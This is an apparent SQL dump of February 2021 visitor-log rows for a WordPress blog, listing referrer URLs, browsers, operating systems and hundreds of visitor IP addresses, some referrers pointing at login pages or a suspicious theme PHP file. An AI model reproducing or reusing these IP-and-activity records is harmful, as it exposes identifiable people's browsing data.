(8759,'2021-02-08','http://ictbank.ir/blog','Opera Devices','Unknown','Unknown',NULL,NULL,'','185.128.25.236','000',0,2,0),
(8760,'2021-02-08','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','82.99.232.34','000',0,4,0),
(8761,'2021-02-08','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','122.176.67.71','000',0,2,0),
(8762,'2021-02-08','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.52.145.66','000',0,2,0),
(8763,'2021-02-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.102.18.4','000',0,2,0),
(8764,'2021-02-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.101','000',0,4,0),
(8765,'2021-02-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','163.172.230.173','000',0,2,0),
(8766,'2021-02-08','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','15.228.58.205','000',0,1,0),
(8767,'2021-02-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(8768,'2021-02-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(8769,'2021-02-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8770,'2021-02-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(8771,'2021-02-08','http://ictbank.ir/blog','Chrome','Ubuntu','Unknown',NULL,NULL,'','79.135.82.11','000',0,4,0),
(8772,'2021-02-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.24.141','000',0,1,0),
(8773,'2021-02-08','https://www.google.com/','Opera','Linux','Unknown',NULL,NULL,'','94.230.145.34','000',0,1,0),
(8774,'2021-02-08','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','73.179.185.78','000',0,2,0),
(8775,'2021-02-08','http://ictbank.ir/blog','Opera Devices','Unknown','Unknown',NULL,NULL,'','84.17.62.208','000',0,2,0),
(8776,'2021-02-08','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','172.104.7.162','000',0,1,0),
(8777,'2021-02-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.105.112','000',0,1,0),
(8778,'2021-02-08','android-app://org.telegram.messenger/','Chrome','Android','10',NULL,NULL,'','74.3.141.155','000',0,1,0),
(8779,'2021-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.206.107.118','000',0,2,0),
(8780,'2021-02-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(8781,'2021-02-09','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','101.51.127.87','000',0,2,0),
(8782,'2021-02-09','http://ictbank.ir/blog','Facebook','Android','6.0',NULL,NULL,'','89.187.189.240','000',0,2,0),
(8783,'2021-02-09','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,2,0),
(8784,'2021-02-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','178.159.37.134','000',0,1,0),
(8785,'2021-02-09','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.184.155.204','000',0,5,0),
(8786,'2021-02-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','52.60.189.115','000',0,5,0),
(8787,'2021-02-09','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','194.127.172.98','000',0,2,0),
(8788,'2021-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','120.220.250.166','000',0,1,0),
(8789,'2021-02-09','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','106.208.175.185','000',0,2,0),
(8790,'2021-02-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','77.81.191.202','000',0,2,0),
(8791,'2021-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.209.143','000',0,1,0),
(8792,'2021-02-09','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','185.191.207.189','000',0,2,0),
(8793,'2021-02-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8794,'2021-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.64.21.149','000',0,1,0),
(8795,'2021-02-09','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','15.228.91.21','000',0,1,0),
(8796,'2021-02-09','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.238.119.177','000',0,1,0),
(8797,'2021-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.240.108','000',0,1,0),
(8798,'2021-02-09','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','192.145.127.52','000',0,2,0),
(8799,'2021-02-09','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','170.238.73.100','000',0,2,0),
(8800,'2021-02-09','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','82.102.18.251','000',0,2,0),
(8801,'2021-02-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(8802,'2021-02-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(8803,'2021-02-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(8804,'2021-02-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(8805,'2021-02-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','192.145.124.100','000',0,2,0),
(8806,'2021-02-09','http://ictbank.ir/blog','Android Browser','Android','10',NULL,NULL,'','38.86.135.113','000',0,1,0),
(8807,'2021-02-09','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','92.242.240.10','000',0,1,0),
(8808,'2021-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.31.21.5','000',0,1,0),
(8809,'2021-02-10','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','213.232.87.88','000',0,2,0),
(8810,'2021-02-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.205.34','000',0,1,0),
(8811,'2021-02-10','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','115.87.128.5','000',0,2,0),
(8812,'2021-02-10','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','31.168.98.73','000',0,2,0),
(8813,'2021-02-10','http://ictbank.ir/blog','Safari','iOS','12.0',NULL,NULL,'','192.71.103.173','000',0,1,0),
(8814,'2021-02-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(8815,'2021-02-10','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','54.176.188.51','000',0,5,0),
(8816,'2021-02-10','https://www.google.ru/','Chrome','Windows','6.1',NULL,NULL,'','213.222.225.116','000',0,2,0),
(8817,'2021-02-10','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','37.120.204.140','000',0,2,0),
(8818,'2021-02-10','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','15.228.40.169','000',0,1,0),
(8819,'2021-02-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.18.46.92','000',0,1,0),
(8820,'2021-02-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','79.36.209.214','000',0,1,0),
(8821,'2021-02-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.116.86','000',0,1,0),
(8822,'2021-02-10','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','88.135.212.110','000',0,2,0),
(8823,'2021-02-10','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','24.133.176.210','000',0,3,0),
(8824,'2021-02-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','95.174.67.172','000',0,2,0),
(8825,'2021-02-10','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','14.141.1.3','000',0,1,0),
(8826,'2021-02-10','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.89.65.15','000',0,2,0),
(8827,'2021-02-10','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.222.64.110','000',0,1,0),
(8828,'2021-02-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.233.49','000',0,1,0),
(8829,'2021-02-10','http://ictbank.ir/blog','Android Browser','Android','7.1.2',NULL,NULL,'','185.236.42.111','000',0,2,0),
(8830,'2021-02-10','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','103.97.96.31','000',0,2,0),
(8831,'2021-02-10','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','165.231.33.212','000',0,2,0),
(8832,'2021-02-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,2,0),
(8833,'2021-02-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(8834,'2021-02-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8835,'2021-02-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(8836,'2021-02-10','http://ictbank.ir/blog','Facebook','iOS','12.3.2',NULL,NULL,'','89.34.98.91','000',0,2,0),
(8837,'2021-02-10','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.230.28.130','000',0,8,0),
(8838,'2021-02-10','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,1,0),
(8839,'2021-02-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.33.72.117','000',0,1,0),
(8840,'2021-02-11','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','180.245.72.4','000',0,2,0),
(8841,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.127.56.236','000',0,1,0),
(8842,'2021-02-11','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','15.228.87.82','000',0,1,0),
(8843,'2021-02-11','http://ictbank.ir/blog','Yandex Browser','Windows','6.3',NULL,NULL,'','194.35.233.149','000',0,2,0),
(8844,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','135.181.85.48','000',0,1,0),
(8845,'2021-02-11','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','89.40.183.7','000',0,2,0),
(8846,'2021-02-11','http://ictbank.ir/blog','Firefox','Windows','6.0',NULL,NULL,'','208.87.237.140','000',0,2,0),
(8847,'2021-02-11','http://www.bing.com','Internet Explorer','Windows','6.1',NULL,NULL,'','204.13.201.138','000',0,1,0),
(8848,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.134.32.240','000',0,3,0),
(8849,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','95.49.190.122','000',0,3,0),
(8850,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','83.28.5.135','000',0,1,0),
(8851,'2021-02-11','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,5,0),
(8852,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.112.184.223','000',0,1,0),
(8853,'2021-02-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','168.1.32.22','000',0,1,0),
(8854,'2021-02-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','169.45.249.5','000',0,1,0),
(8855,'2021-02-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.220.149.4','000',0,1,0),
(8856,'2021-02-11','http://ictbank.ir/blog/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','Internet Explorer','Windows','6.1',NULL,NULL,'','135.148.33.137','000',0,1,0),
(8857,'2021-02-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','92.118.12.13','000',0,1,0),
(8858,'2021-02-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.1.212.76','000',0,4,0),
(8859,'2021-02-11','http://www.google.com/','Opera','Windows','6.0',NULL,NULL,'','89.208.29.62','000',0,1,0),
(8860,'2021-02-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','91.207.57.99','000',0,1,0),
(8861,'2021-02-11','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','100.24.121.158','000',0,1,0),
(8862,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','205.169.39.158','000',0,2,0),
(8863,'2021-02-11','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','205.169.39.27','000',0,1,0),
(8864,'2021-02-11','http://ictbank.ir/blog','Safari','iOS','10.3.1',NULL,NULL,'','205.169.39.11','000',0,1,0),
(8865,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','205.169.39.36','000',0,1,0),
(8866,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.221.105.70','000',0,1,0),
(8867,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.220.2.255','000',0,1,0),
(8868,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.25.58.60','000',0,1,0),
(8869,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','196.199.122.214','000',0,1,0),
(8870,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.100','000',0,4,0),
(8871,'2021-02-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','85.203.22.33','000',0,1,0),
(8872,'2021-02-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(8873,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.44.77.112','000',0,2,0),
(8874,'2021-02-11','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','203.150.130.212','000',0,2,0),
(8875,'2021-02-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','18.27.197.252','000',0,1,0),
(8876,'2021-02-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.166.253.23','000',0,1,0),
(8877,'2021-02-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(8878,'2021-02-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','45.123.117.14','000',0,1,0),
(8879,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.77.47','000',0,1,0),
(8880,'2021-02-11','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','82.102.21.52','000',0,2,0),
(8881,'2021-02-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','209.141.61.129','000',0,1,0),
(8882,'2021-02-11','http://design-arena.ir/blog/','Chrome','Windows','6.2',NULL,NULL,'','176.125.229.135','000',0,1,0),
(8883,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.29.6','000',0,8,0),
(8884,'2021-02-11','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','86.105.135.234','000',0,1,0),
(8885,'2021-02-11','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','185.245.85.172','000',0,2,0),
(8886,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.2.75','000',0,1,0),
(8887,'2021-02-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(8888,'2021-02-11','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.138.193.133','000',0,1,0),
(8889,'2021-02-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','192.145.127.244','000',0,2,0),
(8890,'2021-02-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8891,'2021-02-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8892,'2021-02-11','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','114.143.206.99','000',0,3,0),
(8893,'2021-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.236.42.115','000',0,2,0),
(8894,'2021-02-11','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.8.10.202','000',0,1,0),
(8895,'2021-02-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(8896,'2021-02-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(8897,'2021-02-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,2,0),
(8898,'2021-02-11','http://ictbank.ir/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','109.252.111.198','000',0,1,0),
(8899,'2021-02-11','http://design-arena.ir/','Chrome','Windows','10.0',NULL,NULL,'','163.172.21.241','000',0,1,0),
(8900,'2021-02-11','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','95.33.251.60','000',0,2,0),
(8901,'2021-02-11','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','141.98.103.236','000',0,2,0),
(8902,'2021-02-11','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.122','000',0,17,0),
(8903,'2021-02-12','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','77.45.234.54','000',0,2,0),
(8904,'2021-02-12','http://ictbank.ir/','Chrome','Windows','10.0',NULL,NULL,'','163.172.5.130','000',0,1,0),
(8905,'2021-02-12','http://ictbank.ir/blog','Android Browser','Android','3.2',NULL,NULL,'','165.231.33.212','000',0,2,0),
(8906,'2021-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.100','000',0,4,0),
(8907,'2021-02-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','37.120.148.182','000',0,2,0),
(8908,'2021-02-12','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.172','000',0,1,0),
(8909,'2021-02-12','http://design-arena.ir/blog','Unknown','Android','7.0',NULL,NULL,'','192.71.10.105','000',0,1,0),
(8910,'2021-02-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','37.49.229.214','000',0,1,0),
(8911,'2021-02-12','http://ictbank.ir/blog','Instagram','iOS','12.0.1',NULL,NULL,'','37.120.204.212','000',0,2,0),
(8912,'2021-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.145.233','000',0,1,0),
(8913,'2021-02-12','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','14.98.105.218','000',0,2,0),
(8914,'2021-02-12','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','79.135.82.11','000',0,4,0),
(8915,'2021-02-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','52.192.73.251','000',0,5,0),
(8916,'2021-02-12','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','194.35.233.149','000',0,2,0),
(8917,'2021-02-12','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','52.65.15.196','000',0,5,0),
(8918,'2021-02-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8919,'2021-02-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','91.235.129.81','000',0,1,0),
(8920,'2021-02-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','195.206.107.118','000',0,1,0),
(8921,'2021-02-12','http://www.ictbank.ir/','Chrome','Windows','10.0',NULL,NULL,'','51.15.26.92','000',0,2,0),
(8922,'2021-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.183.133','000',0,1,0),
(8923,'2021-02-12','http://ictbank.ir/blog','UC Browser','Series60','3',NULL,NULL,'','178.239.173.240','000',0,2,0),
(8924,'2021-02-12','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','186.48.143.197','000',0,2,0),
(8925,'2021-02-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(8926,'2021-02-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(8927,'2021-02-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8928,'2021-02-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(8929,'2021-02-12','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','51.159.88.84','000',0,2,0),
(8930,'2021-02-12','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','159.203.81.46','000',0,2,0),
(8931,'2021-02-12','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','36.71.235.154','000',0,2,0),
(8932,'2021-02-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.169.255.4','000',0,2,0),
(8933,'2021-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.72.73.86','000',0,3,0),
(8934,'2021-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','207.180.255.81','000',0,1,0),
(8935,'2021-02-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(8936,'2021-02-13','http://ictbank.ir/blog','Firefox Mobile','Android','10',NULL,NULL,'','173.47.109.138','000',0,2,0),
(8937,'2021-02-13','http://ictbank.ir/blog','Chrome','Fedora','Unknown',NULL,NULL,'','97.116.56.215','000',0,1,0),
(8938,'2021-02-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','189.51.96.151','000',0,54,0),
(8939,'2021-02-13','http://82.102.9.14/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','2.57.122.21','000',0,1,0),
(8940,'2021-02-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(8941,'2021-02-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(8942,'2021-02-13','http://ictbank.ir/blog','Yandex Browser','Windows','6.2',NULL,NULL,'','194.35.233.149','000',0,2,0),
(8943,'2021-02-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8944,'2021-02-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','91.235.129.81','000',0,3,0),
(8945,'2021-02-13','http://ictbank.ir/blog','Firefox Mobile','Android','10',NULL,NULL,'','174.250.209.28','000',0,2,0),
(8946,'2021-02-13','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','43.231.62.82','000',0,2,0),
(8947,'2021-02-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.120.149.38','000',0,2,0),
(8948,'2021-02-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.78.229','000',0,1,0),
(8949,'2021-02-13','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.38.150.96','000',0,2,0),
(8950,'2021-02-13','https://www.ecosia.org/','Firefox','Fedora','Unknown',NULL,NULL,'','94.69.162.132','000',0,3,0),
(8951,'2021-02-13','http://ictbank.ir/blog','Android Browser','Android','1.5',NULL,NULL,'','220.181.77.162','000',0,6,0),
(8952,'2021-02-13','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','126.241.25.221','000',0,1,0),
(8953,'2021-02-13','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','103.70.38.27','000',0,2,0),
(8954,'2021-02-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','79.36.209.214','000',0,1,0),
(8955,'2021-02-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.124.104','000',0,1,0),
(8956,'2021-02-13','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.254.47.41','000',0,2,0),
(8957,'2021-02-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','89.238.191.174','000',0,2,0),
(8958,'2021-02-13','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','116.103.242.0','000',0,2,0),
(8959,'2021-02-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,2,0),
(8960,'2021-02-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(8961,'2021-02-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8962,'2021-02-13','https://www.google.ru/','Chrome','Windows','6.1',NULL,NULL,'','213.222.225.116','000',0,1,0),
(8963,'2021-02-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','50.116.36.25','000',0,1,0),
(8964,'2021-02-13','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','92.223.89.226','000',0,2,0),
(8965,'2021-02-14','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','54.78.25.4','000',0,1,0),
(8966,'2021-02-14','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','24.212.18.33','000',0,1,0),
(8967,'2021-02-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.138.202.6','000',0,1,0),
(8968,'2021-02-14','http://design-arena.ir/?feed=atom','Chrome','Windows','10.0',NULL,NULL,'','163.172.22.87','000',0,1,0),
(8969,'2021-02-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(8970,'2021-02-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(8971,'2021-02-14','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','194.35.233.40','000',0,2,0),
(8972,'2021-02-14','http://ictbank.ir/?feed=atom','Chrome','Windows','10.0',NULL,NULL,'','163.172.21.241','000',0,1,0),
(8973,'2021-02-14','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','62.217.133.70','000',0,2,0),
(8974,'2021-02-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','109.202.111.221','000',0,2,0),
(8975,'2021-02-14','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','80.82.68.201','000',0,1,0),
(8976,'2021-02-14','http://www.ictbank.ir/?feed=atom','Chrome','Windows','10.0',NULL,NULL,'','51.159.37.117','000',0,2,0),
(8977,'2021-02-14','http://ictbank.ir/blog','UC Browser','Android','6.0.1',NULL,NULL,'','92.223.89.226','000',0,2,0),
(8978,'2021-02-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.97.190','000',0,1,0),
(8979,'2021-02-14','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','49.206.200.108','000',0,1,0),
(8980,'2021-02-14','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,1,0),
(8981,'2021-02-14','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','210.186.182.87','000',0,2,0),
(8982,'2021-02-14','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.188.167.126','000',0,1,0),
(8983,'2021-02-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','217.138.207.172','000',0,2,0),
